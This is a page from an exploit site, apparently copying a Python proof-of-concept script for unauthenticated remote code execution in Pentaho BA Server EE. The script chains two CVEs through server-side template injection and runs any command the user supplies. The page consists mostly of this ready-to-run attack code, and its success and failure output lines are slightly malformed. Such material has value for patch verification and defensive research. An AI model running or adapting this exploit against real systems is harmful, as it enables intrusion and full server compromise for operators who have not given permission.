Edit Report

Our sensors found this exploit at:

Below is a copy:

Pentaho BA Server EE Server-Side Template Injection / Remote Code Execution
# Title: Pentaho BA Server EE - RCE via Server-Side Template Injection (Unauthenticated)
# Author: dwbzn
# Date: 2022-04-04
# Vendor:
# Software Link:
# Version: Pentaho BA Server
# CVE: CVE-2022-43769, CVE-2022-43939
# Tested on: Windows 11
# Credits:
# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).

# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (
import requests
import argparse

parser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')
parser.add_argument('baseurl', type=str, help='base url e.g.')
parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)
args = parser.parse_args()

url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a"

print ("running...")
r = requests.get(url)
if r.text == 'false':
    print ("command should've executed! nice.")
    print ("didn't work. sadge...")

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.